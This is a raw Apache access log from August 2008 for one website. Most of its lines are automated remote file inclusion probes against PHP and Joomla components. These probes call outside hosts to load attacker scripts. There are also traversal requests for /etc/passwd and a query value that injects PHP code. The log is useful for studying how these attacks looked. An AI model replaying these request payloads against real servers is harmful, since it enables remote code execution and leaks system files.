118.129.166.13 - - [21/Aug/2008:10:57:10 -0700] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://roux.be/Joomla/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.141.87.6 - - [21/Aug/2008:10:57:13 -0700] "GET /logs/access_080329.log/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.141.87.6 - - [21/Aug/2008:10:57:15 -0700] "GET /?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 200 9928 "-" "libwww-perl/5.805" "www.dmulk.com"
211.141.87.6 - - [21/Aug/2008:10:57:16 -0700] "GET /logs/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 200 61570 "-" "libwww-perl/5.805" "www.dmulk.com"
218.189.215.148 - - [21/Aug/2008:10:57:21 -0700] "GET /logs/access_080614.log/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:10:57:22 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.17.142.173 - - [21/Aug/2008:10:57:24 -0700] "GET /logs/access_080530.log%20//errors.php?error=http://www.sellnation.com/admin/classes/log/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:10:57:25 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
118.129.166.13 - - [21/Aug/2008:10:57:27 -0700] "GET /logs/access_080131.log/errors.php?error=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
118.129.166.13 - - [21/Aug/2008:10:57:27 -0700] "GET /errors.php?error=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
118.129.166.13 - - [21/Aug/2008:10:57:27 -0700] "GET /logs/errors.php?error=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
118.129.166.13 - - [21/Aug/2008:10:57:34 -0700] "GET /logs/access_071225.log/errors.php?error=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
211.141.87.6 - - [21/Aug/2008:10:57:37 -0700] "GET /logs/access_080518.log/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:10:58:01 -0700] "GET /logs/index1.php?choix=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.178.147.89 - - [21/Aug/2008:10:58:13 -0700] "GET /logs/access_080810.log/?mosConfig_absolute_path=http://www.topyn.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
193.178.147.89 - - [21/Aug/2008:10:58:15 -0700] "GET /?mosConfig_absolute_path=http://www.topyn.com/bajo.txt????? HTTP/1.1" 200 9890 "-" "libwww-perl/5.812" "www.dmulk.com"
193.178.147.89 - - [21/Aug/2008:10:58:15 -0700] "GET /logs/?mosConfig_absolute_path=http://www.topyn.com/bajo.txt????? HTTP/1.1" 200 61570 "-" "libwww-perl/5.812" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:10:58:21 -0700] "GET /logs/access_080730.log/index1.php?choix=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.68.160 - - [21/Aug/2008:10:58:21 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://russianinterpreter.ru/administrator/templates/mambo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.160 - - [21/Aug/2008:10:58:23 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://russianinterpreter.ru/administrator/templates/mambo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.133.96.246 - - [21/Aug/2008:10:58:32 -0700] "GET /logs/access_080725.log/index.php?_SERVER[DOCUMENT_ROOT]=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
211.141.87.6 - - [21/Aug/2008:10:58:33 -0700] "GET /logs/access_080218.log/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:10:58:36 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:10:58:40 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:10:58:40 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.15.10.22 - - [21/Aug/2008:10:58:43 -0700] "GET /logs/access_080516.log/index.php?configFile=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [21/Aug/2008:10:58:43 -0700] "GET /logs/index.php?configFile=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [21/Aug/2008:10:58:43 -0700] "GET /logs/access_080503.log/index.php?configFile=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [21/Aug/2008:10:58:44 -0700] "GET /index.php?configFile=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 200 9909 "-" "libwww-perl/5.810" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:10:59:05 -0700] "GET /index1.php?choix=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:10:59:19 -0700] "GET /logs/index1.php?choix=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.52.143.147 - - [21/Aug/2008:10:59:23 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
204.15.10.22 - - [21/Aug/2008:10:59:26 -0700] "GET /logs/access_080731.log/index.php?content=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:10:59:36 -0700] "GET /logs/access_080730.log/index1.php?choix=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.137.82 - - [21/Aug/2008:10:59:44 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kx-td.com/images/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.137.82 - - [21/Aug/2008:10:59:44 -0700] "GET /logs/access_080812.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kx-td.com/images/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.137.82 - - [21/Aug/2008:10:59:44 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kx-td.com/images/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [21/Aug/2008:10:59:44 -0700] "GET /index.php?configFile=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 200 9909 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.22.186 - - [21/Aug/2008:10:59:57 -0700] "GET /bikes/dteel/2008_08_17/?S=A HTTP/1.0" 200 983 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
91.121.143.183 - - [21/Aug/2008:11:00:15 -0700] "GET /logs/access_080809.log/layout/default/params.php?gConf[dir][layouts]=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.143.183 - - [21/Aug/2008:11:00:16 -0700] "GET /layout/default/params.php?gConf[dir][layouts]=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.143.183 - - [21/Aug/2008:11:00:16 -0700] "GET /logs/layout/default/params.php?gConf[dir][layouts]=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.15.10.22 - - [21/Aug/2008:11:00:18 -0700] "GET /logs/index.php?x=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [21/Aug/2008:11:00:18 -0700] "GET /index.php?x=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 200 9900 "-" "libwww-perl/5.810" "www.dmulk.com"
217.31.58.188 - - [21/Aug/2008:11:00:19 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.devilhouse.org/temp/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.31.58.188 - - [21/Aug/2008:11:00:20 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.devilhouse.org/temp/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.31.58.188 - - [21/Aug/2008:11:00:21 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.devilhouse.org/temp/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.15.10.22 - - [21/Aug/2008:11:00:27 -0700] "GET /logs/access_080209.log/index.php?configFile=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.121.143.183 - - [21/Aug/2008:11:00:32 -0700] "GET /logs/access_080118.log/errors.php?error=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.133.96.246 - - [21/Aug/2008:11:01:16 -0700] "GET /logs/index.php?_SERVER[DOCUMENT_ROOT]=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
83.133.96.246 - - [21/Aug/2008:11:01:16 -0700] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 200 9935 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
83.133.96.246 - - [21/Aug/2008:11:01:20 -0700] "GET /logs/access_080723.log/index.php?_SERVER[DOCUMENT_ROOT]=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
217.202.13.92 - - [21/Aug/2008:11:01:23 -0700] "GET /logs/access_080810.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.202.13.92 - - [21/Aug/2008:11:01:24 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.31.58.188 - - [21/Aug/2008:11:01:24 -0700] "GET /logs/access_080214.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.devilhouse.org/temp/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:01:25 -0700] "GET /logs/access_080503.log//SQuery/lib/gore.php?libpath=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.202.13.92 - - [21/Aug/2008:11:01:26 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.67.108.12 - - [21/Aug/2008:11:01:29 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://www.djaviboss.com/install/idmia.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:01:35 -0700] "GET //SQuery/lib/gore.php?libpath=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:01:39 -0700] "GET /logs//SQuery/lib/gore.php?libpath=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.67.135 - - [21/Aug/2008:11:01:46 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.67.135 - - [21/Aug/2008:11:01:47 -0700] "GET /logs/access_080606.log HTTP/1.1" 200 3843942 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
151.67.108.12 - - [21/Aug/2008:11:01:49 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://www.djaviboss.com/install/idmia.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:01:53 -0700] "GET /logs/access_080628.log//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:01:57 -0700] "GET //hw3.php?daysonly=0).include($_GET[file]).(0&file=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.11.67.242 - - [21/Aug/2008:11:02:04 -0700] "GET /logs/access_080118.log/errors.php?error=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.29.68.160 - - [21/Aug/2008:11:02:19 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://russianinterpreter.ru/administrator/templates/mambo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.160 - - [21/Aug/2008:11:02:20 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://russianinterpreter.ru/administrator/templates/mambo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:02:26 -0700] "GET //hw3.php?daysonly=0).include($_GET[file]).(0&file=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
75.127.70.16 - - [21/Aug/2008:11:02:35 -0700] "GET /logs/access_080809.log/errors.php?error=http://www.netops-fr.info/remote/ident.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.127.70.16 - - [21/Aug/2008:11:02:35 -0700] "GET /logs/errors.php?error=http://www.netops-fr.info/remote/ident.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.127.70.16 - - [21/Aug/2008:11:02:35 -0700] "GET /errors.php?error=http://www.netops-fr.info/remote/ident.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.127.70.16 - - [21/Aug/2008:11:02:39 -0700] "GET /logs/access_080315.log/errors.php?error=http://www.netops-fr.info/remote/ident.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.121.143.183 - - [21/Aug/2008:11:02:43 -0700] "GET /logs/access_080124.log/errors.php?error=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
151.67.108.12 - - [21/Aug/2008:11:02:49 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://www.djaviboss.com/install/idmia.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.111.176.122 - - [21/Aug/2008:11:02:49 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.133.96.246 - - [21/Aug/2008:11:02:49 -0700] "GET /logs/access_080725.log/index.php?_SERVER[DOCUMENT_ROOT]=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
190.41.11.250 - - [21/Aug/2008:11:02:59 -0700] "GET /logs/index.php?meio=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.41.11.250 - - [21/Aug/2008:11:03:01 -0700] "GET /index.php?meio=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 200 9903 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:11:03:03 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:03:04 -0700] "GET /logs/access_080516.log//SQuery/lib/gore.php?libpath=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.67.108.12 - - [21/Aug/2008:11:03:08 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://www.djaviboss.com/install/idmia.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:11:03:13 -0700] "GET /logs/access_080810.log/errors.php?error=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:11:03:13 -0700] "GET /errors.php?error=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:11:03:13 -0700] "GET /logs/errors.php?error=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:11:03:49 -0700] "GET /logs/access_080409.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:11:04:09 -0700] "GET /logs/access_080723.log/admin.php?DOCUMENT_ROOT=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:11:04:09 -0700] "GET /admin.php?DOCUMENT_ROOT=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:11:04:10 -0700] "GET /logs/admin.php?DOCUMENT_ROOT=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:04:20 -0700] "GET /logs/access_080628.log//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
58.65.239.170 - - [21/Aug/2008:11:04:22 -0700] "GET /logs/access_080201.log HTTP/1.1" 200 393216 "-" "-" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:04:24 -0700] "GET //hw3.php?daysonly=0).include($_GET[file]).(0&file=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
204.15.10.22 - - [21/Aug/2008:11:04:32 -0700] "GET /logs/access_080718.log/index.php?x=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
151.67.108.12 - - [21/Aug/2008:11:04:42 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://www.djaviboss.com/install/idmia.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.11.67.242 - - [21/Aug/2008:11:04:50 -0700] "GET /logs/access_080124.log/errors.php?error=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.65.239.170 - - [21/Aug/2008:11:04:51 -0700] "GET /logs/access_080201.log HTTP/1.1" 200 393216 "-" "-" "www.dmulk.com"
217.31.58.188 - - [21/Aug/2008:11:04:54 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.devilhouse.org/temp/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.31.58.188 - - [21/Aug/2008:11:04:55 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.devilhouse.org/temp/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:11:05:06 -0700] "GET /logs/access_080725.log/admin.php?DOCUMENT_ROOT=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.21.231 - - [21/Aug/2008:11:05:07 -0700] "GET /logs/access_080320.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.caneus.org/d?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.21.231 - - [21/Aug/2008:11:05:08 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.caneus.org/d?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:11:05:10 -0700] "GET /logs/access_080810.log/errors.php?error=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:11:05:10 -0700] "GET /errors.php?error=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:11:05:10 -0700] "GET /logs/errors.php?error=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
87.230.21.231 - - [21/Aug/2008:11:05:18 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.caneus.org/d?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.21.231 - - [21/Aug/2008:11:05:18 -0700] "GET /logs/access_080221.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.caneus.org/d?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:11:05:21 -0700] "GET /logs/access_080703.log/errors.php?error=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
87.230.21.231 - - [21/Aug/2008:11:05:29 -0700] "GET /logs/access_080406.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.caneus.org/d?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.21.231 - - [21/Aug/2008:11:05:29 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.caneus.org/d?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.21.231 - - [21/Aug/2008:11:05:29 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.caneus.org/d?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:11:05:32 -0700] "GET /logs/access_080703.log/errors.php?error=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
151.67.108.12 - - [21/Aug/2008:11:05:34 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://www.djaviboss.com/install/idmia.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.21.231 - - [21/Aug/2008:11:05:35 -0700] "GET /logs/access_080312.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.caneus.org/d?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.21.231 - - [21/Aug/2008:11:05:36 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.caneus.org/d?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.21.231 - - [21/Aug/2008:11:05:36 -0700] "GET /logs/access_080124.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.caneus.org/d?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:11:05:37 -0700] "GET /logs/admin.php?DOCUMENT_ROOT=http://katsioulis.com/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
